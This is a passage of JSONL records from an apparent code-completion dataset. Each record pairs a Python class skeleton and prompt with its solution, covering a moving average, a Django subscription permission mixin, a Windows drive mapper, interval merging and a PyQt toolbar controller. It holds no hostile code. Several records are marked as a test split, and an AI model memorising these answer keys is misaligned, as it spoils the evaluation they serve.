"snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MovingAverage:\n def __init__(self, size):\n \"\"\"Initialize your data structure here. :type size: int\"\"\"\n self.array = [None for _ in range(size)]\n self.i = 0\n self.total = 0\n\n def next(self, val):\n \"\"\":type val: int :rtype: float\"\"\"\n if self.array[self.i] is not None:\n self.total -= self.array[self.i]\n self.total += val\n self.array[self.i] = val\n self.i = (self.i + 1) % len(self.array)\n count = len(self.array)\n if self.array[-1] is None:\n count = self.i\n return self.total / float(count)\n", "source": "the_stack_v2_python_sparse", "source_path": "python_1_to_1000/346_Moving_Average_from_Data_Stream.py", "source_repo": "jakehoare/leetcode", "split": "test", "star_events_count": 58} {"blob_id": "cd1dcc7943b5b0910611c7826539ded39b3590c2", "bodies": ["if self.request.user.is_authenticated and self.request.user.deck.count() > 50:\n try:\n return self.request.user.has_active_subscription or self.request.user.subscription.type.product.attr.access_cards\n except:\n return False\nif not hasattr(self, 'get_object'):\n if self.request.user.is_authenticated:\n return True\n else:\n return False\nself.object = self.get_object()\nif isinstance(self.object, Card):\n card = self.object\nelse:\n card = self.object.card\nif not self.request.user.is_authenticated:\n return card.public\nelse:\n return Card.objects.for_user(self.request.user).filter(id=card.id).exists() or self.request.user.deck.filter(card=card).exists()", "if not self.request.user.is_authenticated:\n return BBLoginRequiredMixin.handle_no_permission(self)\ntry:\n if not self.student.subscription.type.product.attr.access_cards:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\nexcept:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\nraise PermissionDenied"], "bodies_text": "<|body_start_0|>\n if self.request.user.is_authenticated and self.request.user.deck.count() > 50:\n try:\n return self.request.user.has_active_subscription or self.request.user.subscription.type.product.attr.access_cards\n except:\n return False\n if not hasattr(self, 'get_object'):\n if self.request.user.is_authenticated:\n return True\n else:\n return False\n self.object = self.get_object()\n if isinstance(self.object, Card):\n card = self.object\n else:\n card = self.object.card\n if not self.request.user.is_authenticated:\n return card.public\n else:\n return Card.objects.for_user(self.request.user).filter(id=card.id).exists() or self.request.user.deck.filter(card=card).exists()\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.request.user.is_authenticated:\n return BBLoginRequiredMixin.handle_no_permission(self)\n try:\n if not self.student.subscription.type.product.attr.access_cards:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\n except:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\n raise PermissionDenied\n<|end_body_1|>\n", "class_docstring": "", "class_name": "RevisionPermissionMixin", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RevisionPermissionMixin:\n\n def test_func(self):\n \"\"\"Check if trial period is over and if user is allowed to access requested object.\"\"\"\n <|body_0|>\n\n def handle_no_permission(self):\n \"\"\"Ask user to login or to subscribe to a cards plan.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.request.user.is_authenticated and self.request.user.deck.count() > 50:\n try:\n return self.request.user.has_active_subscription or self.request.user.subscription.type.product.attr.access_cards\n except:\n return False\n if not hasattr(self, 'get_object'):\n if self.request.user.is_authenticated:\n return True\n else:\n return False\n self.object = self.get_object()\n if isinstance(self.object, Card):\n card = self.object\n else:\n card = self.object.card\n if not self.request.user.is_authenticated:\n return card.public\n else:\n return Card.objects.for_user(self.request.user).filter(id=card.id).exists() or self.request.user.deck.filter(card=card).exists()\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.request.user.is_authenticated:\n return BBLoginRequiredMixin.handle_no_permission(self)\n try:\n if not self.student.subscription.type.product.attr.access_cards:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\n except:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\n raise PermissionDenied\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000169", "length_bytes": 26085, "license_type": "permissive", "methods": [{"docstring": "Check if trial period is over and if user is allowed to access requested object.", "name": "test_func", "signature": "def test_func(self)"}, {"docstring": "Ask user to login or to subscribe to a cards plan.", "name": "handle_no_permission", "signature": "def handle_no_permission(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002956", "prompt": "Implement the Python class `RevisionPermissionMixin` described below.\n\nClass description:\nImplement the RevisionPermissionMixin class.\n\nMethod signatures and docstrings:\n- def test_func(self): Check if trial period is over and if user is allowed to access requested object.\n- def handle_no_permission(self): Ask user to login or to subscribe to a cards plan.", "prompted_full_text": "Implement the Python class `RevisionPermissionMixin` described below.\n\nClass description:\nImplement the RevisionPermissionMixin class.\n\nMethod signatures and docstrings:\n- def test_func(self): Check if trial period is over and if user is allowed to access requested object.\n- def handle_no_permission(self): Ask user to login or to subscribe to a cards plan.\n\n<|skeleton|>\nclass RevisionPermissionMixin:\n\n def test_func(self):\n \"\"\"Check if trial period is over and if user is allowed to access requested object.\"\"\"\n <|body_0|>\n\n def handle_no_permission(self):\n \"\"\"Ask user to login or to subscribe to a cards plan.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.request.user.is_authenticated and self.request.user.deck.count() > 50:\n try:\n return self.request.user.has_active_subscription or self.request.user.subscription.type.product.attr.access_cards\n except:\n return False\n if not hasattr(self, 'get_object'):\n if self.request.user.is_authenticated:\n return True\n else:\n return False\n self.object = self.get_object()\n if isinstance(self.object, Card):\n card = self.object\n else:\n card = self.object.card\n if not self.request.user.is_authenticated:\n return card.public\n else:\n return Card.objects.for_user(self.request.user).filter(id=card.id).exists() or self.request.user.deck.filter(card=card).exists()\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.request.user.is_authenticated:\n return BBLoginRequiredMixin.handle_no_permission(self)\n try:\n if not self.student.subscription.type.product.attr.access_cards:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\n except:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\n raise PermissionDenied\n<|end_body_1|>\n", "revision_id": "461de3ba011c0aaed3f0014136c4497b6890d086", "skeleton": "<|skeleton|>\nclass RevisionPermissionMixin:\n\n def test_func(self):\n \"\"\"Check if trial period is over and if user is allowed to access requested object.\"\"\"\n <|body_0|>\n\n def handle_no_permission(self):\n \"\"\"Ask user to login or to subscribe to a cards plan.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RevisionPermissionMixin:\n def test_func(self):\n \"\"\"Check if trial period is over and if user is allowed to access requested object.\"\"\"\n if self.request.user.is_authenticated and self.request.user.deck.count() > 50:\n try:\n return self.request.user.has_active_subscription or self.request.user.subscription.type.product.attr.access_cards\n except:\n return False\n if not hasattr(self, 'get_object'):\n if self.request.user.is_authenticated:\n return True\n else:\n return False\n self.object = self.get_object()\n if isinstance(self.object, Card):\n card = self.object\n else:\n card = self.object.card\n if not self.request.user.is_authenticated:\n return card.public\n else:\n return Card.objects.for_user(self.request.user).filter(id=card.id).exists() or self.request.user.deck.filter(card=card).exists()\n\n def handle_no_permission(self):\n \"\"\"Ask user to login or to subscribe to a cards plan.\"\"\"\n if not self.request.user.is_authenticated:\n return BBLoginRequiredMixin.handle_no_permission(self)\n try:\n if not self.student.subscription.type.product.attr.access_cards:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\n except:\n return redirect(reverse('cards:stop', kwargs={'id': 'trialover'}))\n raise PermissionDenied\n", "source": "the_stack_v2_python_sparse", "source_path": "blousebrothers/cards/views.py", "source_repo": "sladinji/blousebrothers", "split": "test", "star_events_count": 1} {"blob_id": "378233ad859a5b8468c17383613d4d7207e7f60c", "bodies": ["if not self._MAPPING:\n self._MAPPING['\\\\Device\\\\Mup'] = None\n self._MAPPING['\\\\SystemRoot'] = os.environ['SystemRoot']\n for letter in (chr(l) for l in range(ord('C'), ord('Z') + 1)):\n try:\n letter = '%s:' % letter\n mapped = QueryDosDevice(letter)\n if mapped in self._MAPPING:\n logging.warning(\"Two drives: '%s' and '%s', are mapped to the same disk. Drive letters are a user-mode concept and the kernel traces only have NT path, so all accesses will be associated with the first drive letter, independent of the actual letter used by the code\" % (self._MAPPING[mapped], letter))\n else:\n self._MAPPING[mapped] = letter\n except WindowsError:\n pass", "match = re.match('(^\\\\\\\\Device\\\\\\\\[a-zA-Z0-9]+)(\\\\\\\\.*)?$', path)\nif not match:\n raise ValueError(\"Can't convert %s into a Win32 compatible path\" % path, path)\nif not match.group(1) in self._MAPPING:\n return None\ndrive = self._MAPPING[match.group(1)]\nif not drive or not match.group(2):\n return drive\nreturn drive + match.group(2)"], "bodies_text": "<|body_start_0|>\n if not self._MAPPING:\n self._MAPPING['\\\\Device\\\\Mup'] = None\n self._MAPPING['\\\\SystemRoot'] = os.environ['SystemRoot']\n for letter in (chr(l) for l in range(ord('C'), ord('Z') + 1)):\n try:\n letter = '%s:' % letter\n mapped = QueryDosDevice(letter)\n if mapped in self._MAPPING:\n logging.warning(\"Two drives: '%s' and '%s', are mapped to the same disk. Drive letters are a user-mode concept and the kernel traces only have NT path, so all accesses will be associated with the first drive letter, independent of the actual letter used by the code\" % (self._MAPPING[mapped], letter))\n else:\n self._MAPPING[mapped] = letter\n except WindowsError:\n pass\n<|end_body_0|>\n\n<|body_start_1|>\n match = re.match('(^\\\\\\\\Device\\\\\\\\[a-zA-Z0-9]+)(\\\\\\\\.*)?$', path)\n if not match:\n raise ValueError(\"Can't convert %s into a Win32 compatible path\" % path, path)\n if not match.group(1) in self._MAPPING:\n return None\n drive = self._MAPPING[match.group(1)]\n if not drive or not match.group(2):\n return drive\n return drive + match.group(2)\n<|end_body_1|>\n", "class_docstring": "Maps \\\\Device\\\\HarddiskVolumeN to N: on Windows.", "class_name": "DosDriveMap", "detected_licenses": ["Apache-2.0", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DosDriveMap:\n \"\"\"Maps \\\\Device\\\\HarddiskVolumeN to N: on Windows.\"\"\"\n\n def __init__(self):\n \"\"\"Lazy loads the cache.\"\"\"\n <|body_0|>\n\n def to_win32(self, path):\n \"\"\"Converts a native NT path to Win32/DOS compatible path.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not self._MAPPING:\n self._MAPPING['\\\\Device\\\\Mup'] = None\n self._MAPPING['\\\\SystemRoot'] = os.environ['SystemRoot']\n for letter in (chr(l) for l in range(ord('C'), ord('Z') + 1)):\n try:\n letter = '%s:' % letter\n mapped = QueryDosDevice(letter)\n if mapped in self._MAPPING:\n logging.warning(\"Two drives: '%s' and '%s', are mapped to the same disk. Drive letters are a user-mode concept and the kernel traces only have NT path, so all accesses will be associated with the first drive letter, independent of the actual letter used by the code\" % (self._MAPPING[mapped], letter))\n else:\n self._MAPPING[mapped] = letter\n except WindowsError:\n pass\n<|end_body_0|>\n\n<|body_start_1|>\n match = re.match('(^\\\\\\\\Device\\\\\\\\[a-zA-Z0-9]+)(\\\\\\\\.*)?$', path)\n if not match:\n raise ValueError(\"Can't convert %s into a Win32 compatible path\" % path, path)\n if not match.group(1) in self._MAPPING:\n return None\n drive = self._MAPPING[match.group(1)]\n if not drive or not match.group(2):\n return drive\n return drive + match.group(2)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000170", "length_bytes": 42355, "license_type": "permissive", "methods": [{"docstring": "Lazy loads the cache.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Converts a native NT path to Win32/DOS compatible path.", "name": "to_win32", "signature": "def to_win32(self, path)"}], "n_methods": 2, "prompt": "Implement the Python class `DosDriveMap` described below.\n\nClass description:\nMaps \\\\Device\\\\HarddiskVolumeN to N: on Windows.\n\nMethod signatures and docstrings:\n- def __init__(self): Lazy loads the cache.\n- def to_win32(self, path): Converts a native NT path to Win32/DOS compatible path.", "prompted_full_text": "Implement the Python class `DosDriveMap` described below.\n\nClass description:\nMaps \\\\Device\\\\HarddiskVolumeN to N: on Windows.\n\nMethod signatures and docstrings:\n- def __init__(self): Lazy loads the cache.\n- def to_win32(self, path): Converts a native NT path to Win32/DOS compatible path.\n\n<|skeleton|>\nclass DosDriveMap:\n \"\"\"Maps \\\\Device\\\\HarddiskVolumeN to N: on Windows.\"\"\"\n\n def __init__(self):\n \"\"\"Lazy loads the cache.\"\"\"\n <|body_0|>\n\n def to_win32(self, path):\n \"\"\"Converts a native NT path to Win32/DOS compatible path.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not self._MAPPING:\n self._MAPPING['\\\\Device\\\\Mup'] = None\n self._MAPPING['\\\\SystemRoot'] = os.environ['SystemRoot']\n for letter in (chr(l) for l in range(ord('C'), ord('Z') + 1)):\n try:\n letter = '%s:' % letter\n mapped = QueryDosDevice(letter)\n if mapped in self._MAPPING:\n logging.warning(\"Two drives: '%s' and '%s', are mapped to the same disk. Drive letters are a user-mode concept and the kernel traces only have NT path, so all accesses will be associated with the first drive letter, independent of the actual letter used by the code\" % (self._MAPPING[mapped], letter))\n else:\n self._MAPPING[mapped] = letter\n except WindowsError:\n pass\n<|end_body_0|>\n\n<|body_start_1|>\n match = re.match('(^\\\\\\\\Device\\\\\\\\[a-zA-Z0-9]+)(\\\\\\\\.*)?$', path)\n if not match:\n raise ValueError(\"Can't convert %s into a Win32 compatible path\" % path, path)\n if not match.group(1) in self._MAPPING:\n return None\n drive = self._MAPPING[match.group(1)]\n if not drive or not match.group(2):\n return drive\n return drive + match.group(2)\n<|end_body_1|>\n", "revision_id": "10cc5fdcca53e2a1690867acbe6fce099273f092", "skeleton": "<|skeleton|>\nclass DosDriveMap:\n \"\"\"Maps \\\\Device\\\\HarddiskVolumeN to N: on Windows.\"\"\"\n\n def __init__(self):\n \"\"\"Lazy loads the cache.\"\"\"\n <|body_0|>\n\n def to_win32(self, path):\n \"\"\"Converts a native NT path to Win32/DOS compatible path.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DosDriveMap:\n \"\"\"Maps \\\\Device\\\\HarddiskVolumeN to N: on Windows.\"\"\"\n\n def __init__(self):\n \"\"\"Lazy loads the cache.\"\"\"\n if not self._MAPPING:\n self._MAPPING['\\\\Device\\\\Mup'] = None\n self._MAPPING['\\\\SystemRoot'] = os.environ['SystemRoot']\n for letter in (chr(l) for l in range(ord('C'), ord('Z') + 1)):\n try:\n letter = '%s:' % letter\n mapped = QueryDosDevice(letter)\n if mapped in self._MAPPING:\n logging.warning(\"Two drives: '%s' and '%s', are mapped to the same disk. Drive letters are a user-mode concept and the kernel traces only have NT path, so all accesses will be associated with the first drive letter, independent of the actual letter used by the code\" % (self._MAPPING[mapped], letter))\n else:\n self._MAPPING[mapped] = letter\n except WindowsError:\n pass\n\n def to_win32(self, path):\n \"\"\"Converts a native NT path to Win32/DOS compatible path.\"\"\"\n match = re.match('(^\\\\\\\\Device\\\\\\\\[a-zA-Z0-9]+)(\\\\\\\\.*)?$', path)\n if not match:\n raise ValueError(\"Can't convert %s into a Win32 compatible path\" % path, path)\n if not match.group(1) in self._MAPPING:\n return None\n drive = self._MAPPING[match.group(1)]\n if not drive or not match.group(2):\n return drive\n return drive + match.group(2)\n", "source": "the_stack_v2_python_sparse", "source_path": "client/utils/file_path.py", "source_repo": "luci/luci-py", "split": "test", "star_events_count": 84} {"blob_id": "5fa3f76a150a38cf2edcbc3ad7e01e5d68dedc0f", "bodies": ["n = len(intervals)\nif n <= 1:\n return intervals\nintervals = sorted(intervals, key=lambda x: x[0])\nstack = []\nfor i in range(0, len(intervals)):\n start = intervals[i][0]\n if stack and stack[-1][1] >= start:\n stack[-1][1] = max(stack[-1][1], intervals[i][1])\n else:\n stack.append([start, intervals[i][1]])\nreturn stack", "n = len(intervals)\nif n <= 1:\n return intervals\nintervals = sorted(intervals, key=lambda x: x[1])\nstack = []\nfor i in range(0, len(intervals)):\n start = intervals[i][0]\n while stack and stack[-1][1] >= intervals[i][0]:\n start = min(stack[-1][0], intervals[i][0])\n stack.pop()\n stack.append([start, intervals[i][1]])\nreturn stack"], "bodies_text": "<|body_start_0|>\n n = len(intervals)\n if n <= 1:\n return intervals\n intervals = sorted(intervals, key=lambda x: x[0])\n stack = []\n for i in range(0, len(intervals)):\n start = intervals[i][0]\n if stack and stack[-1][1] >= start:\n stack[-1][1] = max(stack[-1][1], intervals[i][1])\n else:\n stack.append([start, intervals[i][1]])\n return stack\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(intervals)\n if n <= 1:\n return intervals\n intervals = sorted(intervals, key=lambda x: x[1])\n stack = []\n for i in range(0, len(intervals)):\n start = intervals[i][0]\n while stack and stack[-1][1] >= intervals[i][0]:\n start = min(stack[-1][0], intervals[i][0])\n stack.pop()\n stack.append([start, intervals[i][1]])\n return stack\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def merge(self, intervals):\n \"\"\":type intervals: List[List[int]] :rtype: List[List[int]]\"\"\"\n <|body_0|>\n\n def merge0(self, intervals):\n \"\"\":type intervals: List[List[int]] :rtype: List[List[int]]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(intervals)\n if n <= 1:\n return intervals\n intervals = sorted(intervals, key=lambda x: x[0])\n stack = []\n for i in range(0, len(intervals)):\n start = intervals[i][0]\n if stack and stack[-1][1] >= start:\n stack[-1][1] = max(stack[-1][1], intervals[i][1])\n else:\n stack.append([start, intervals[i][1]])\n return stack\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(intervals)\n if n <= 1:\n return intervals\n intervals = sorted(intervals, key=lambda x: x[1])\n stack = []\n for i in range(0, len(intervals)):\n start = intervals[i][0]\n while stack and stack[-1][1] >= intervals[i][0]:\n start = min(stack[-1][0], intervals[i][0])\n stack.pop()\n stack.append([start, intervals[i][1]])\n return stack\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000171", "length_bytes": 1868, "license_type": "no_license", "methods": [{"docstring": ":type intervals: List[List[int]] :rtype: List[List[int]]", "name": "merge", "signature": "def merge(self, intervals)"}, {"docstring": ":type intervals: List[List[int]] :rtype: List[List[int]]", "name": "merge0", "signature": "def merge0(self, intervals)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def merge(self, intervals): :type intervals: List[List[int]] :rtype: List[List[int]]\n- def merge0(self, intervals): :type intervals: List[List[int]] :rtype: List[List[int]]", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def merge(self, intervals): :type intervals: List[List[int]] :rtype: List[List[int]]\n- def merge0(self, intervals): :type intervals: List[List[int]] :rtype: List[List[int]]\n\n<|skeleton|>\nclass Solution:\n\n def merge(self, intervals):\n \"\"\":type intervals: List[List[int]] :rtype: List[List[int]]\"\"\"\n <|body_0|>\n\n def merge0(self, intervals):\n \"\"\":type intervals: List[List[int]] :rtype: List[List[int]]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(intervals)\n if n <= 1:\n return intervals\n intervals = sorted(intervals, key=lambda x: x[0])\n stack = []\n for i in range(0, len(intervals)):\n start = intervals[i][0]\n if stack and stack[-1][1] >= start:\n stack[-1][1] = max(stack[-1][1], intervals[i][1])\n else:\n stack.append([start, intervals[i][1]])\n return stack\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(intervals)\n if n <= 1:\n return intervals\n intervals = sorted(intervals, key=lambda x: x[1])\n stack = []\n for i in range(0, len(intervals)):\n start = intervals[i][0]\n while stack and stack[-1][1] >= intervals[i][0]:\n start = min(stack[-1][0], intervals[i][0])\n stack.pop()\n stack.append([start, intervals[i][1]])\n return stack\n<|end_body_1|>\n", "revision_id": "6e18c5d257840489cc3fb1079ae3804c743982a4", "skeleton": "<|skeleton|>\nclass Solution:\n\n def merge(self, intervals):\n \"\"\":type intervals: List[List[int]] :rtype: List[List[int]]\"\"\"\n <|body_0|>\n\n def merge0(self, intervals):\n \"\"\":type intervals: List[List[int]] :rtype: List[List[int]]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def merge(self, intervals):\n \"\"\":type intervals: List[List[int]] :rtype: List[List[int]]\"\"\"\n n = len(intervals)\n if n <= 1:\n return intervals\n intervals = sorted(intervals, key=lambda x: x[0])\n stack = []\n for i in range(0, len(intervals)):\n start = intervals[i][0]\n if stack and stack[-1][1] >= start:\n stack[-1][1] = max(stack[-1][1], intervals[i][1])\n else:\n stack.append([start, intervals[i][1]])\n return stack\n\n def merge0(self, intervals):\n \"\"\":type intervals: List[List[int]] :rtype: List[List[int]]\"\"\"\n n = len(intervals)\n if n <= 1:\n return intervals\n intervals = sorted(intervals, key=lambda x: x[1])\n stack = []\n for i in range(0, len(intervals)):\n start = intervals[i][0]\n while stack and stack[-1][1] >= intervals[i][0]:\n start = min(stack[-1][0], intervals[i][0])\n stack.pop()\n stack.append([start, intervals[i][1]])\n return stack\n", "source": "the_stack_v2_python_sparse", "source_path": "56.合并区间.py", "source_repo": "yangyuxiang1996/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "cd5b0eaac77f0be9d073d598041706f6988bfe06", "bodies": ["AbstractController.__init__(self, widget, mainWindow, parentController=parentController)\nself._toolbarAction = toolbarAction\nself.forwardAction = forwardAction\nself.forwardMenu = QtGui.QMenu(widget)\nself.forwardAction.setData(QtCore.QVariant(1))\nself.forwardAction.setMenu(self.forwardMenu)\nself.backwardAction = backwardAction\nself.backwardMenu = QtGui.QMenu(widget)\nself.backwardAction.setData(QtCore.QVariant(-1))\nself.backwardAction.setMenu(self.backwardMenu)\nself.parentDirectoryAction = parentDirectoryAction\nself.refreshAction = refreshAction\nself._delegate = _ToolbarDelegate(self)\nself.setActivated(False)", "self.widget.setEnabled(activated)\nif activated:\n self.forwardAction.setEnabled(not activated)\n self.backwardAction.setEnabled(not activated)\n self.parentDirectoryAction.setEnabled(not activated)\n self.refreshAction.setEnabled(activated)\nelse:\n self.forwardAction.setEnabled(activated)\n self.backwardAction.setEnabled(activated)\n self.parentDirectoryAction.setEnabled(activated)\n self.refreshAction.setEnabled(activated)", "menu.clear()\nfor steps, path in enumerate(pathlist):\n action = QtGui.QAction(path, menu)\n action.setData(QtCore.QVariant((steps + 1) * iterator))\n QtCore.QObject.connect(action, QtCore.SIGNAL('triggered()'), self._createJumpToPathActionSlot(action))\n menu.addAction(action)\nif len(pathlist):\n menu.setDefaultAction(menu.actions()[0])", "def _jumpToPathActionSlot():\n steps, success = action.data().toInt()\n if success:\n self.model.relativeHistoryIndex = steps\nreturn _jumpToPathActionSlot"], "bodies_text": "<|body_start_0|>\n AbstractController.__init__(self, widget, mainWindow, parentController=parentController)\n self._toolbarAction = toolbarAction\n self.forwardAction = forwardAction\n self.forwardMenu = QtGui.QMenu(widget)\n self.forwardAction.setData(QtCore.QVariant(1))\n self.forwardAction.setMenu(self.forwardMenu)\n self.backwardAction = backwardAction\n self.backwardMenu = QtGui.QMenu(widget)\n self.backwardAction.setData(QtCore.QVariant(-1))\n self.backwardAction.setMenu(self.backwardMenu)\n self.parentDirectoryAction = parentDirectoryAction\n self.refreshAction = refreshAction\n self._delegate = _ToolbarDelegate(self)\n self.setActivated(False)\n<|end_body_0|>\n\n<|body_start_1|>\n self.widget.setEnabled(activated)\n if activated:\n self.forwardAction.setEnabled(not activated)\n self.backwardAction.setEnabled(not activated)\n self.parentDirectoryAction.setEnabled(not activated)\n self.refreshAction.setEnabled(activated)\n else:\n self.forwardAction.setEnabled(activated)\n self.backwardAction.setEnabled(activated)\n self.parentDirectoryAction.setEnabled(activated)\n self.refreshAction.setEnabled(activated)\n<|end_body_1|>\n\n<|body_start_2|>\n menu.clear()\n for steps, path in enumerate(pathlist):\n action = QtGui.QAction(path, menu)\n action.setData(QtCore.QVariant((steps + 1) * iterator))\n QtCore.QObject.connect(action, QtCore.SIGNAL('triggered()'), self._createJumpToPathActionSlot(action))\n menu.addAction(action)\n if len(pathlist):\n menu.setDefaultAction(menu.actions()[0])\n<|end_body_2|>\n\n<|body_start_3|>\n def _jumpToPathActionSlot():\n steps, success = action.data().toInt()\n if success:\n self.model.relativeHistoryIndex = steps\n return _jumpToPathActionSlot\n<|end_body_3|>\n", "class_docstring": "Controls the tool bar view including navigation in item history.", "class_name": "ToolbarController", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ToolbarController:\n \"\"\"Controls the tool bar view including navigation in item history.\"\"\"\n\n def __init__(self, forwardAction, backwardAction, parentDirectoryAction, refreshAction, toolbarAction, widget, mainWindow, parentController):\n \"\"\"Constructor.\"\"\"\n <|body_0|>\n\n def setActivated(self, activated):\n \"\"\"Activates or deactivates of the tool bar.\"\"\"\n <|body_1|>\n\n def createHistoryMenu(self, pathlist, menu, iterator):\n \"\"\"Create a menu from the given list with L{QtCore.QModelIndex} objects. @param pathlist: List of history paths objects. @type pathlist: C{list} @param menu: Menu to which the given path list will added to. @type menu: C{QtGui.QMenu} @param iterator: The iterator that specifies if the menu will move relative forward or backward. @type iterator: C{int}\"\"\"\n <|body_2|>\n\n def _createJumpToPathActionSlot(self, action):\n \"\"\"Creates a slot which directly jumps to the associated path in the history.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n AbstractController.__init__(self, widget, mainWindow, parentController=parentController)\n self._toolbarAction = toolbarAction\n self.forwardAction = forwardAction\n self.forwardMenu = QtGui.QMenu(widget)\n self.forwardAction.setData(QtCore.QVariant(1))\n self.forwardAction.setMenu(self.forwardMenu)\n self.backwardAction = backwardAction\n self.backwardMenu = QtGui.QMenu(widget)\n self.backwardAction.setData(QtCore.QVariant(-1))\n self.backwardAction.setMenu(self.backwardMenu)\n self.parentDirectoryAction = parentDirectoryAction\n self.refreshAction = refreshAction\n self._delegate = _ToolbarDelegate(self)\n self.setActivated(False)\n<|end_body_0|>\n\n<|body_start_1|>\n self.widget.setEnabled(activated)\n if activated:\n self.forwardAction.setEnabled(not activated)\n self.backwardAction.setEnabled(not activated)\n self.parentDirectoryAction.setEnabled(not activated)\n self.refreshAction.setEnabled(activated)\n else:\n self.forwardAction.setEnabled(activated)\n self.backwardAction.setEnabled(activated)\n self.parentDirectoryAction.setEnabled(activated)\n self.refreshAction.setEnabled(activated)\n<|end_body_1|>\n\n<|body_start_2|>\n menu.clear()\n for steps, path in enumerate(pathlist):\n action = QtGui.QAction(path, menu)\n action.setData(QtCore.QVariant((steps + 1) * iterator))\n QtCore.QObject.connect(action, QtCore.SIGNAL('triggered()'), self._createJumpToPathActionSlot(action))\n menu.addAction(action)\n if len(pathlist):\n menu.setDefaultAction(menu.actions()[0])\n<|end_body_2|>\n\n<|body_start_3|>\n def _jumpToPathActionSlot():\n steps, success = action.data().toInt()\n if success:\n self.model.relativeHistoryIndex = steps\n return _jumpToPathActionSlot\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000172", "length_bytes": 7921, "license_type": "no_license", "methods": [{"docstring": "Constructor.", "name": "__init__", "signature": "def __init__(self, forwardAction, backwardAction, parentDirectoryAction, refreshAction, toolbarAction, widget, mainWindow, parentController)"}, {"docstring": "Activates or deactivates of the tool bar.", "name": "setActivated", "signature": "def setActivated(self, activated)"}, {"docstring": "Create a menu from the given list with L{QtCore.QModelIndex} objects. @param pathlist: List of history paths objects. @type pathlist: C{list} @param menu: Menu to which the given path list will added to. @type menu: C{QtGui.QMenu} @param iterator: The iterator that specifies if the menu will move relative forward or backward. @type iterator: C{int}", "name": "createHistoryMenu", "signature": "def createHistoryMenu(self, pathlist, menu, iterator)"}, {"docstring": "Creates a slot which directly jumps to the associated path in the history.", "name": "_createJumpToPathActionSlot", "signature": "def _createJumpToPathActionSlot(self, action)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_006955", "prompt": "Implement the Python class `ToolbarController` described below.\n\nClass description:\nControls the tool bar view including navigation in item history.\n\nMethod signatures and docstrings:\n- def __init__(self, forwardAction, backwardAction, parentDirectoryAction, refreshAction, toolbarAction, widget, mainWindow, parentController): Constructor.\n- def setActivated(self, activated): Activates or deactivates of the tool bar.\n- def createHistoryMenu(self, pathlist, menu, iterator): Create a menu from the given list with L{QtCore.QModelIndex} objects. @param pathlist: List of history paths objects. @type pathlist: C{list} @param menu: Menu to which the given path list will added to. @type menu: C{QtGui.QMenu} @param iterator: The iterator that specifies if the menu will move relative forward or backward. @type iterator: C{int}\n- def _createJumpToPathActionSlot(self, action): Creates a slot which directly jumps to the associated path in the history.", "prompted_full_text": "Implement the Python class `ToolbarController` described below.\n\nClass description:\nControls the tool bar view including navigation in item history.\n\nMethod signatures and docstrings:\n- def __init__(self, forwardAction, backwardAction, parentDirectoryAction, refreshAction, toolbarAction, widget, mainWindow, parentController): Constructor.\n- def setActivated(self, activated): Activates or deactivates of the tool bar.\n- def createHistoryMenu(self, pathlist, menu, iterator): Create a menu from the given list with L{QtCore.QModelIndex} objects. @param pathlist: List of history paths objects. @type pathlist: C{list} @param menu: Menu to which the given path list will added to. @type menu: C{QtGui.QMenu} @param iterator: The iterator that specifies if the menu will move relative forward or backward. @type iterator: C{int}\n- def 